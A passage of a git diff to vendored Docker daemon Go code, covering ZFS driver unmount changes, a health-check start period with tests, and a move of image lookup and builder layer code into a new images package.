 
-	return mountpoint, nil
+	return containerfs.NewLocalContainerFS(mountpoint), nil
 }
 
 // Put removes the existing mountpoint for the given id if it exists.
@@ -396,16 +408,18 @@ func (d *Driver) Put(id string) error {
 	if count := d.ctr.Decrement(mountpoint); count > 0 {
 		return nil
 	}
-	mounted, err := graphdriver.Mounted(graphdriver.FsMagicZfs, mountpoint)
-	if err != nil || !mounted {
-		return err
-	}
 
-	logrus.Debugf(`[zfs] unmount("%s")`, mountpoint)
+	logger := logrus.WithField("storage-driver", "zfs")
+
+	logger.Debugf(`unmount("%s")`, mountpoint)
 
-	if err := mount.Unmount(mountpoint); err != nil {
-		return fmt.Errorf("error unmounting to %s: %v", mountpoint, err)
+	if err := unix.Unmount(mountpoint, unix.MNT_DETACH); err != nil {
+		logger.Warnf("Failed to unmount %s mount %s: %v", id, mountpoint, err)
 	}
+	if err := unix.Rmdir(mountpoint); err != nil && !os.IsNotExist(err) {
+		logger.Debugf("Failed to remove %s mount point %s: %v", id, mountpoint, err)
+	}
+
 	return nil
 }
 
@@ -413,5 +427,5 @@ func (d *Driver) Put(id string) error {
 func (d *Driver) Exists(id string) bool {
 	d.Lock()
 	defer d.Unlock()
-	return d.filesystemsCache[d.zfsPath(id)] == true
+	return d.filesystemsCache[d.zfsPath(id)]
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go
index 1c05fa794c..f15aae0596 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go
@@ -1,23 +1,23 @@
-package zfs
+package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs"
 
 import (
 	"fmt"
 	"strings"
-	"syscall"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 func checkRootdirFs(rootdir string) error {
-	var buf syscall.Statfs_t
-	if err := syscall.Statfs(rootdir, &buf); err != nil {
+	var buf unix.Statfs_t
+	if err := unix.Statfs(rootdir, &buf); err != nil {
 		return fmt.Errorf("Failed to access '%s': %s", rootdir, err)
 	}
 
 	// on FreeBSD buf.Fstypename contains ['z', 'f', 's', 0 ... ]
 	if (buf.Fstypename[0] != 122) || (buf.Fstypename[1] != 102) || (buf.Fstypename[2] != 115) || (buf.Fstypename[3] != 0) {
-		logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir)
+		logrus.WithField("storage-driver", "zfs").Debugf("no zfs dataset found for rootdir '%s'", rootdir)
 		return graphdriver.ErrPrerequisites
 	}
 
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go
index 52ed516049..589ecbd179 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go
@@ -1,21 +1,22 @@
-package zfs
+package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs"
 
 import (
-	"fmt"
-	"syscall"
-
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/sirupsen/logrus"
 )
 
-func checkRootdirFs(rootdir string) error {
-	var buf syscall.Statfs_t
-	if err := syscall.Statfs(rootdir, &buf); err != nil {
-		return fmt.Errorf("Failed to access '%s': %s", rootdir, err)
+func checkRootdirFs(rootDir string) error {
+	fsMagic, err := graphdriver.GetFSMagic(rootDir)
+	if err != nil {
+		return err
+	}
+	backingFS := "unknown"
+	if fsName, ok := graphdriver.FsNames[fsMagic]; ok {
+		backingFS = fsName
 	}
 
-	if graphdriver.FsMagic(buf.Type) != graphdriver.FsMagicZfs {
-		logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir)
+	if fsMagic != graphdriver.FsMagicZfs {
+		logrus.WithField("root", rootDir).WithField("backingFS", backingFS).WithField("storage-driver", "zfs").Error("No zfs dataset found for root")
 		return graphdriver.ErrPrerequisites
 	}
 
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go
deleted file mode 100644
index bb4a85bd64..0000000000
--- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go
+++ /dev/null
@@ -1,59 +0,0 @@
-// +build solaris,cgo
-
-package zfs
-
-/*
-#include <sys/statvfs.h>
-#include <stdlib.h>
-
-static inline struct statvfs *getstatfs(char *s) {
-        struct statvfs *buf;
-        int err;
-        buf = (struct statvfs *)malloc(sizeof(struct statvfs));
-        err = statvfs(s, buf);
-        return buf;
-}
-*/
-import "C"
-import (
-	"path/filepath"
-	"strings"
-	"unsafe"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/daemon/graphdriver"
-)
-
-func checkRootdirFs(rootdir string) error {
-
-	cs := C.CString(filepath.Dir(rootdir))
-	buf := C.getstatfs(cs)
-
-	// on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ]
-	if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) ||
-		(buf.f_basetype[3] != 0) {
-		logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir)
-		C.free(unsafe.Pointer(buf))
-		return graphdriver.ErrPrerequisites
-	}
-
-	C.free(unsafe.Pointer(buf))
-	C.free(unsafe.Pointer(cs))
-	return nil
-}
-
-/* rootfs is introduced to comply with the OCI spec
-which states that root filesystem must be mounted at <CID>/rootfs/ instead of <CID>/
-*/
-func getMountpoint(id string) string {
-	maxlen := 12
-
-	// we need to preserve filesystem suffix
-	suffix := strings.SplitN(id, "-", 2)
-
-	if len(suffix) > 1 {
-		return filepath.Join(id[:maxlen]+"-"+suffix[1], "rootfs", "root")
-	}
-
-	return filepath.Join(id[:maxlen], "rootfs", "root")
-}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go
index 3e22928438..b5d6cb18c7 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package zfs
+package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs"
 
 import (
 	"testing"
@@ -27,7 +27,7 @@ func TestZfsCreateSnap(t *testing.T) {
 }
 
 func TestZfsSetQuota(t *testing.T) {
-	graphtest.DriverTestSetQuota(t, "zfs")
+	graphtest.DriverTestSetQuota(t, "zfs", true)
 }
 
 func TestZfsTeardown(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go
index ce8daadaf6..1b77030684 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go
@@ -1,6 +1,6 @@
-// +build !linux,!freebsd,!solaris
+// +build !linux,!freebsd
 
-package zfs
+package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs"
 
 func checkRootdirFs(rootdir string) error {
 	return nil
diff --git a/vendor/github.com/docker/docker/daemon/health.go b/vendor/github.com/docker/docker/daemon/health.go
index 5b01dc0f40..ae0d7f8921 100644
--- a/vendor/github.com/docker/docker/daemon/health.go
+++ b/vendor/github.com/docker/docker/daemon/health.go
@@ -1,21 +1,20 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"runtime"
 	"strings"
 	"sync"
 	"time"
 
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/types"
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/strslice"
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/daemon/exec"
+	"github.com/sirupsen/logrus"
 )
 
 const (
@@ -30,6 +29,10 @@ const (
 	// than this, the check is considered to have failed.
 	defaultProbeTimeout = 30 * time.Second
 
+	// The time given for the container to start before the health check starts considering
+	// the container unstable. Defaults to none.
+	defaultStartPeriod = 0 * time.Second
+
 	// Default number of consecutive failures of the health check
 	// for the container to be considered unhealthy.
 	defaultProbeRetries = 3
@@ -41,8 +44,7 @@ const (
 const (
 	// Exit status codes that can be returned by the probe command.
 
-	exitStatusHealthy   = 0 // Container is healthy
-	exitStatusUnhealthy = 1 // Container is unhealthy
+	exitStatusHealthy = 0 // Container is healthy
 )
 
 // probe implementations know how to run a particular type of probe.
@@ -60,30 +62,39 @@ type cmdProbe struct {
 
 // exec the healthcheck command in the container.
 // Returns the exit code and probe output (if any)
-func (p *cmdProbe) run(ctx context.Context, d *Daemon, container *container.Container) (*types.HealthcheckResult, error) {
-
-	cmdSlice := strslice.StrSlice(container.Config.Healthcheck.Test)[1:]
+func (p *cmdProbe) run(ctx context.Context, d *Daemon, cntr *container.Container) (*types.HealthcheckResult, error) {
+	cmdSlice := strslice.StrSlice(cntr.Config.Healthcheck.Test)[1:]
 	if p.shell {
-		cmdSlice = append(getShell(container.Config), cmdSlice...)
+		cmdSlice = append(getShell(cntr.Config), cmdSlice...)
 	}
 	entrypoint, args := d.getEntrypointAndArgs(strslice.StrSlice{}, cmdSlice)
 	execConfig := exec.NewConfig()
 	execConfig.OpenStdin = false
 	execConfig.OpenStdout = true
 	execConfig.OpenStderr = true
-	execConfig.ContainerID = container.ID
+	execConfig.ContainerID = cntr.ID
 	execConfig.DetachKeys = []byte{}
 	execConfig.Entrypoint = entrypoint
 	execConfig.Args = args
 	execConfig.Tty = false
 	execConfig.Privileged = false
-	execConfig.User = container.Config.User
+	execConfig.User = cntr.Config.User
+	execConfig.WorkingDir = cntr.Config.WorkingDir
+
+	linkedEnv, err := d.setupLinkedContainers(cntr)
+	if err != nil {
+		return nil, err
+	}
+	execConfig.Env = container.ReplaceOrAppendEnvValues(cntr.CreateDaemonEnvironment(execConfig.Tty, linkedEnv), execConfig.Env)
 
-	d.registerExecCommand(container, execConfig)
-	d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "))
+	d.registerExecCommand(cntr, execConfig)
+	attributes := map[string]string{
+		"execID": execConfig.ID,
+	}
+	d.LogContainerEventWithAttributes(cntr, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "), attributes)
 
 	output := &limitedBuffer{}
-	err := d.ContainerExecStart(ctx, execConfig.ID, nil, output, output)
+	err = d.ContainerExecStart(ctx, execConfig.ID, nil, output, output)
 	if err != nil {
 		return nil, err
 	}
@@ -92,7 +103,7 @@ func (p *cmdProbe) run(ctx context.Context, d *Daemon, container *container.Cont
 		return nil, err
 	}
 	if info.ExitCode == nil {
-		return nil, fmt.Errorf("Healthcheck for container %s has no exit code!", container.ID)
+		return nil, fmt.Errorf("healthcheck for container %s has no exit code", cntr.ID)
 	}
 	// Note: Go's json package will handle invalid UTF-8 for us
 	out := output.String()
@@ -121,7 +132,7 @@ func handleProbeResult(d *Daemon, c *container.Container, result *types.Healthch
 	}
 
 	h := c.State.Health
-	oldStatus := h.Status
+	oldStatus := h.Status()
 
 	if len(h.Log) >= maxLogEntries {
 		h.Log = append(h.Log[len(h.Log)+1-maxLogEntries:], result)
@@ -131,18 +142,43 @@ func handleProbeResult(d *Daemon, c *container.Container, result *types.Healthch
 
 	if result.ExitCode == exitStatusHealthy {
 		h.FailingStreak = 0
-		h.Status = types.Healthy
-	} else {
-		// Failure (including invalid exit code)
-		h.FailingStreak++
-		if h.FailingStreak >= retries {
-			h.Status = types.Unhealthy
+		h.SetStatus(types.Healthy)
+	} else { // Failure (including invalid exit code)
+		shouldIncrementStreak := true
+
+		// If the container is starting (i.e. we never had a successful health check)
+		// then we check if we are within the start period of the container in which
+		// case we do not increment the failure streak.
+		if h.Status() == types.Starting {
+			startPeriod := timeoutWithDefault(c.Config.Healthcheck.StartPeriod, defaultStartPeriod)
+			timeSinceStart := result.Start.Sub(c.State.StartedAt)
+
+			// If still within the start period, then don't increment failing streak.
+			if timeSinceStart < startPeriod {
+				shouldIncrementStreak = false
+			}
+		}
+
+		if shouldIncrementStreak {
+			h.FailingStreak++
+
+			if h.FailingStreak >= retries {
+				h.SetStatus(types.Unhealthy)
+			}
 		}
 		// Else we're starting or healthy. Stay in that state.
 	}
 
-	if oldStatus != h.Status {
-		d.LogContainerEvent(c, "health_status: "+h.Status)
+	// replicate Health status changes
+	if err := c.CheckpointTo(d.containersReplica); err != nil {
+		// queries will be inconsistent until the next probe runs or other state mutations
+		// checkpoint the container
+		logrus.Errorf("Error replicating health state for container %s: %v", c.ID, err)
+	}
+
+	current := h.Status()
+	if oldStatus != current {
+		d.LogContainerEvent(c, "health_status: "+current)
 	}
 }
 
@@ -160,7 +196,7 @@ func monitor(d *Daemon, c *container.Container, stop chan struct{}, probe probe)
 			logrus.Debugf("Running health check for container %s ...", c.ID)
 			startTime := time.Now()
 			ctx, cancelProbe := context.WithTimeout(context.Background(), probeTimeout)
-			results := make(chan *types.HealthcheckResult)
+			results := make(chan *types.HealthcheckResult, 1)
 			go func() {
 				healthChecksCounter.Inc()
 				result, err := probe.run(ctx, d, c)
@@ -183,8 +219,10 @@ func monitor(d *Daemon, c *container.Container, stop chan struct{}, probe probe)
 			select {
 			case <-stop:
 				logrus.Debugf("Stop healthcheck monitoring for container %s (received while probing)", c.ID)
-				// Stop timeout and kill probe, but don't wait for probe to exit.
 				cancelProbe()
+				// Wait for probe to exit (it might take a while to respond to the TERM
+				// signal and we don't want dying probes to pile up).
+				<-results
 				return
 			case result := <-results:
 				handleProbeResult(d, c, result, stop)
@@ -219,6 +257,8 @@ func getProbe(c *container.Container) probe {
 		return &cmdProbe{shell: false}
 	case "CMD-SHELL":
 		return &cmdProbe{shell: true}
+	case "NONE":
+		return nil
 	default:
 		logrus.Warnf("Unknown healthcheck type '%s' (expected 'CMD') in container %s", config.Test[0], c.ID)
 		return nil
@@ -259,11 +299,11 @@ func (d *Daemon) initHealthMonitor(c *container.Container) {
 	d.stopHealthchecks(c)
 
 	if h := c.State.Health; h != nil {
-		h.Status = types.Starting
+		h.SetStatus(types.Starting)
 		h.FailingStreak = 0
 	} else {
 		h := &container.Health{}
-		h.Status = types.Starting
+		h.SetStatus(types.Starting)
 		c.State.Health = h
 	}
 
diff --git a/vendor/github.com/docker/docker/daemon/health_test.go b/vendor/github.com/docker/docker/daemon/health_test.go
index 7e82115d43..db166317fd 100644
--- a/vendor/github.com/docker/docker/daemon/health_test.go
+++ b/vendor/github.com/docker/docker/daemon/health_test.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"testing"
@@ -14,31 +14,36 @@ import (
 func reset(c *container.Container) {
 	c.State = &container.State{}
 	c.State.Health = &container.Health{}
-	c.State.Health.Status = types.Starting
+	c.State.Health.SetStatus(types.Starting)
 }
 
 func TestNoneHealthcheck(t *testing.T) {
 	c := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   "container_id",
-			Name: "container_name",
-			Config: &containertypes.Config{
-				Image: "image_name",
-				Healthcheck: &containertypes.HealthConfig{
-					Test: []string{"NONE"},
-				},
+		ID:   "container_id",
+		Name: "container_name",
+		Config: &containertypes.Config{
+			Image: "image_name",
+			Healthcheck: &containertypes.HealthConfig{
+				Test: []string{"NONE"},
 			},
-			State: &container.State{},
 		},
+		State: &container.State{},
+	}
+	store, err := container.NewViewDB()
+	if err != nil {
+		t.Fatal(err)
+	}
+	daemon := &Daemon{
+		containersReplica: store,
 	}
-	daemon := &Daemon{}
 
 	daemon.initHealthMonitor(c)
 	if c.State.Health != nil {
-		t.Errorf("Expecting Health to be nil, but was not")
+		t.Error("Expecting Health to be nil, but was not")
 	}
 }
 
+// FIXME(vdemeester) This takes around 3s… This is *way* too long
 func TestHealthStates(t *testing.T) {
 	e := events.New()
 	_, l, _ := e.Subscribe()
@@ -57,16 +62,21 @@ func TestHealthStates(t *testing.T) {
 	}
 
 	c := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   "container_id",
-			Name: "container_name",
-			Config: &containertypes.Config{
-				Image: "image_name",
-			},
+		ID:   "container_id",
+		Name: "container_name",
+		Config: &containertypes.Config{
+			Image: "image_name",
 		},
 	}
+
+	store, err := container.NewViewDB()
+	if err != nil {
+		t.Fatal(err)
+	}
+
 	daemon := &Daemon{
-		EventsService: e,
+		EventsService:     e,
+		containersReplica: store,
 	}
 
 	c.Config.Healthcheck = &containertypes.HealthConfig{
@@ -101,8 +111,8 @@ func TestHealthStates(t *testing.T) {
 
 	handleResult(c.State.StartedAt.Add(20*time.Second), 1)
 	handleResult(c.State.StartedAt.Add(40*time.Second), 1)
-	if c.State.Health.Status != types.Starting {
-		t.Errorf("Expecting starting, but got %#v\n", c.State.Health.Status)
+	if status := c.State.Health.Status(); status != types.Starting {
+		t.Errorf("Expecting starting, but got %#v\n", status)
 	}
 	if c.State.Health.FailingStreak != 2 {
 		t.Errorf("Expecting FailingStreak=2, but got %d\n", c.State.Health.FailingStreak)
@@ -115,4 +125,30 @@ func TestHealthStates(t *testing.T) {
 	if c.State.Health.FailingStreak != 0 {
 		t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak)
 	}
+
+	// Test start period
+
+	reset(c)
+	c.Config.Healthcheck.Retries = 2
+	c.Config.Healthcheck.StartPeriod = 30 * time.Second
+
+	handleResult(c.State.StartedAt.Add(20*time.Second), 1)
+	if status := c.State.Health.Status(); status != types.Starting {
+		t.Errorf("Expecting starting, but got %#v\n", status)
+	}
+	if c.State.Health.FailingStreak != 0 {
+		t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak)
+	}
+	handleResult(c.State.StartedAt.Add(50*time.Second), 1)
+	if status := c.State.Health.Status(); status != types.Starting {
+		t.Errorf("Expecting starting, but got %#v\n", status)
+	}
+	if c.State.Health.FailingStreak != 1 {
+		t.Errorf("Expecting FailingStreak=1, but got %d\n", c.State.Health.FailingStreak)
+	}
+	handleResult(c.State.StartedAt.Add(80*time.Second), 0)
+	expect("health_status: healthy")
+	if c.State.Health.FailingStreak != 0 {
+		t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak)
+	}
 }
diff --git a/vendor/github.com/docker/docker/daemon/image.go b/vendor/github.com/docker/docker/daemon/image.go
deleted file mode 100644
index 32a8d77432..0000000000
--- a/vendor/github.com/docker/docker/daemon/image.go
+++ /dev/null
@@ -1,76 +0,0 @@
-package daemon
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/builder"
-	"github.com/docker/docker/image"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/reference"
-)
-
-// ErrImageDoesNotExist is error returned when no image can be found for a reference.
-type ErrImageDoesNotExist struct {
-	RefOrID string
-}
-
-func (e ErrImageDoesNotExist) Error() string {
-	return fmt.Sprintf("no such id: %s", e.RefOrID)
-}
-
-// GetImageID returns an image ID corresponding to the image referred to by
-// refOrID.
-func (daemon *Daemon) GetImageID(refOrID string) (image.ID, error) {
-	id, ref, err := reference.ParseIDOrReference(refOrID)
-	if err != nil {
-		return "", err
-	}
-	if id != "" {
-		if _, err := daemon.imageStore.Get(image.IDFromDigest(id)); err != nil {
-			return "", ErrImageDoesNotExist{refOrID}
-		}
-		return image.IDFromDigest(id), nil
-	}
-
-	if id, err := daemon.referenceStore.Get(ref); err == nil {
-		return image.IDFromDigest(id), nil
-	}
-
-	// deprecated: repo:shortid https://github.com/docker/docker/pull/799
-	if tagged, ok := ref.(reference.NamedTagged); ok {
-		if tag := tagged.Tag(); stringid.IsShortID(stringid.TruncateID(tag)) {
-			if id, err := daemon.imageStore.Search(tag); err == nil {
-				for _, namedRef := range daemon.referenceStore.References(id.Digest()) {
-					if namedRef.Name() == ref.Name() {
-						return id, nil
-					}
-				}
-			}
-		}
-	}
-
-	// Search based on ID
-	if id, err := daemon.imageStore.Search(refOrID); err == nil {
-		return id, nil
-	}
-
-	return "", ErrImageDoesNotExist{refOrID}
-}
-
-// GetImage returns an image corresponding to the image referred to by refOrID.
-func (daemon *Daemon) GetImage(refOrID string) (*image.Image, error) {
-	imgID, err := daemon.GetImageID(refOrID)
-	if err != nil {
-		return nil, err
-	}
-	return daemon.imageStore.Get(imgID)
-}
-
-// GetImageOnBuild looks up a Docker image referenced by `name`.
-func (daemon *Daemon) GetImageOnBuild(name string) (builder.Image, error) {
-	img, err := daemon.GetImage(name)
-	if err != nil {
-		return nil, err
-	}
-	return img, nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/image_tag.go b/vendor/github.com/docker/docker/daemon/image_tag.go
deleted file mode 100644
index 36fa3b462e..0000000000
--- a/vendor/github.com/docker/docker/daemon/image_tag.go
+++ /dev/null
@@ -1,37 +0,0 @@
-package daemon
-
-import (
-	"github.com/docker/docker/image"
-	"github.com/docker/docker/reference"
-)
-
-// TagImage creates the tag specified by newTag, pointing to the image named
-// imageName (alternatively, imageName can also be an image ID).
-func (daemon *Daemon) TagImage(imageName, repository, tag string) error {
-	imageID, err := daemon.GetImageID(imageName)
-	if err != nil {
-		return err
-	}
-
-	newTag, err := reference.WithName(repository)
-	if err != nil {
-		return err
-	}
-	if tag != "" {
-		if newTag, err = reference.WithTag(newTag, tag); err != nil {
-			return err
-		}
-	}
-
-	return daemon.TagImageWithReference(imageID, newTag)
-}
-
-// TagImageWithReference adds the given reference to the image ID provided.
-func (daemon *Daemon) TagImageWithReference(imageID image.ID, newTag reference.Named) error {
-	if err := daemon.referenceStore.AddTag(newTag, imageID.Digest(), true); err != nil {
-		return err
-	}
-
-	daemon.LogImageEvent(imageID.String(), newTag.String(), "tag")
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/images/cache.go b/vendor/github.com/docker/docker/daemon/images/cache.go
new file mode 100644
index 0000000000..3b433106e8
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/cache.go
@@ -0,0 +1,27 @@
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/image/cache"
+	"github.com/sirupsen/logrus"
+)
+
+// MakeImageCache creates a stateful image cache.
+func (i *ImageService) MakeImageCache(sourceRefs []string) builder.ImageCache {
+	if len(sourceRefs) == 0 {
+		return cache.NewLocal(i.imageStore)
+	}
+
+	cache := cache.New(i.imageStore)
+
+	for _, ref := range sourceRefs {
+		img, err := i.GetImage(ref)
+		if err != nil {
+			logrus.Warnf("Could not look up %s for cache resolution, skipping: %+v", ref, err)
+			continue
+		}
+		cache.Populate(img)
+	}
+
+	return cache
+}
diff --git a/vendor/github.com/docker/docker/daemon/images/image.go b/vendor/github.com/docker/docker/daemon/images/image.go
new file mode 100644
index 0000000000..79cc07c4fd
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/image.go
@@ -0,0 +1,64 @@
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"fmt"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/image"
+)
+
+// ErrImageDoesNotExist is error returned when no image can be found for a reference.
+type ErrImageDoesNotExist struct {
+	ref reference.Reference
+}
+
+func (e ErrImageDoesNotExist) Error() string {
+	ref := e.ref
+	if named, ok := ref.(reference.Named); ok {
+		ref = reference.TagNameOnly(named)
+	}
+	return fmt.Sprintf("No such image: %s", reference.FamiliarString(ref))
+}
+
+// NotFound implements the NotFound interface
+func (e ErrImageDoesNotExist) NotFound() {}
+
+// GetImage returns an image corresponding to the image referred to by refOrID.
+func (i *ImageService) GetImage(refOrID string) (*image.Image, error) {
+	ref, err := reference.ParseAnyReference(refOrID)
+	if err != nil {
+		return nil, errdefs.InvalidParameter(err)
+	}
+	namedRef, ok := ref.(reference.Named)
+	if !ok {
+		digested, ok := ref.(reference.Digested)
+		if !ok {
+			return nil, ErrImageDoesNotExist{ref}
+		}
+		id := image.IDFromDigest(digested.Digest())
+		if img, err := i.imageStore.Get(id); err == nil {
+			return img, nil
+		}
+		return nil, ErrImageDoesNotExist{ref}
+	}
+
+	if digest, err := i.referenceStore.Get(namedRef); err == nil {
+		// Search the image stores to get the operating system, defaulting to host OS.
+		id := image.IDFromDigest(digest)
+		if img, err := i.imageStore.Get(id); err == nil {
+			return img, nil
+		}
+	}
+
+	// Search based on ID
+	if id, err := i.imageStore.Search(refOrID); err == nil {
+		img, err := i.imageStore.Get(id)
+		if err != nil {
+			return nil, ErrImageDoesNotExist{ref}
+		}
+		return img, nil
+	}
+
+	return nil, ErrImageDoesNotExist{ref}
+}
diff --git a/vendor/github.com/docker/docker/daemon/images/image_builder.go b/vendor/github.com/docker/docker/daemon/images/image_builder.go
new file mode 100644
index 0000000000..ca7d0fda4a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/image_builder.go
@@ -0,0 +1,219 @@
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"context"
+	"io"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/registry"
+	"github.com/pkg/errors"
+)
+
+type roLayer struct {
+	released   bool
+	layerStore layer.Store
+	roLayer    layer.Layer
+}
+
+func (l *roLayer) DiffID() layer.DiffID {
+	if l.roLayer == nil {
+		return layer.DigestSHA256EmptyTar
+	}
+	return l.roLayer.DiffID()
+}
+
+func (l *roLayer) Release() error {
+	if l.released {
+		return nil
+	}
+	if l.roLayer != nil {
+		metadata, err := l.layerStore.Release(l.roLayer)
+		layer.LogReleaseMetadata(metadata)
+		if err != nil {
+			return errors.Wrap(err, "failed to release ROLayer")
+		}
+	}
+	l.roLayer = nil
+	l.released = true
+	return nil
+}
+
+func (l *roLayer) NewRWLayer() (builder.RWLayer, error) {
+	var chainID layer.ChainID
+	if l.roLayer != nil {
+		chainID = l.roLayer.ChainID()
+	}
+
+	mountID := stringid.GenerateRandomID()
+	newLayer, err := l.layerStore.CreateRWLayer(mountID, chainID, nil)
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to create rwlayer")
+	}
+
+	rwLayer := &rwLayer{layerStore: l.layerStore, rwLayer: newLayer}
+
+	fs, err := newLayer.Mount("")
+	if err != nil {
+		rwLayer.Release()
+		return nil, err
+	}
+
+	rwLayer.fs = fs
+
+	return rwLayer, nil
+}
+
+type rwLayer struct {
+	released   bool
+	layerStore layer.Store
+	rwLayer    layer.RWLayer
+	fs         containerfs.ContainerFS
+}
+
+func (l *rwLayer) Root() containerfs.ContainerFS {
+	return l.fs
+}
+
+func (l *rwLayer) Commit() (builder.ROLayer, error) {
+	stream, err := l.rwLayer.TarStream()
+	if err != nil {
+		return nil, err
+	}
+	defer stream.Close()
+
+	var chainID layer.ChainID
+	if parent := l.rwLayer.Parent(); parent != nil {
+		chainID = parent.ChainID()
+	}
+
+	newLayer, err := l.layerStore.Register(stream, chainID)
+	if err != nil {
+		return nil, err
+	}
+	// TODO: An optimization would be to handle empty layers before returning
+	return &roLayer{layerStore: l.layerStore, roLayer: newLayer}, nil
+}
+
+func (l *rwLayer) Release() error {
+	if l.released {
+		return nil
+	}
+
+	if l.fs != nil {
+		if err := l.rwLayer.Unmount(); err != nil {
+			return errors.Wrap(err, "failed to unmount RWLayer")
+		}
+		l.fs = nil
+	}
+
+	metadata, err := l.layerStore.ReleaseRWLayer(l.rwLayer)
+	layer.LogReleaseMetadata(metadata)
+	if err != nil {
+		return errors.Wrap(err, "failed to release RWLayer")
+	}
+	l.released = true
+	return nil
+}
+
+func newROLayerForImage(img *image.Image, layerStore layer.Store) (builder.ROLayer, error) {
+	if img == nil || img.RootFS.ChainID() == "" {
+		return &roLayer{layerStore: layerStore}, nil
+	}
+	// Hold a reference to the image layer so that it can't be removed before
+	// it is released
+	layer, err := layerStore.Get(img.RootFS.ChainID())
+	if err != nil {
+		return nil, errors.Wrapf(err, "failed to get layer for image %s", img.ImageID())
+	}
+	return &roLayer{layerStore: layerStore, roLayer: layer}, nil
+}
+
+// TODO: could this use the regular daemon PullImage ?
+func (i *ImageService) pullForBuilder(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer, os string) (*image.Image, error) {
+	ref, err := reference.ParseNormalizedNamed(name)
+	if err != nil {
+		return nil, err
+	}
+	ref = reference.TagNameOnly(ref)
+
+	pullRegistryAuth := &types.AuthConfig{}
+	if len(authConfigs) > 0 {
+		// The request came with a full auth config, use it
+		repoInfo, err := i.registryService.ResolveRepository(ref)
+		if err != nil {
+			return nil, err
+		}
+
+		resolvedConfig := registry.ResolveAuthConfig(authConfigs, repoInfo.Index)
+		pullRegistryAuth = &resolvedConfig
+	}
+
+	if err := i.pullImageWithReference(ctx, ref, os, nil, pullRegistryAuth, output); err != nil {
+		return nil, err
+	}
+	return i.GetImage(name)
+}
+
+// GetImageAndReleasableLayer returns an image and releaseable layer for a reference or ID.
+// Every call to GetImageAndReleasableLayer MUST call releasableLayer.Release() to prevent
+// leaking of layers.
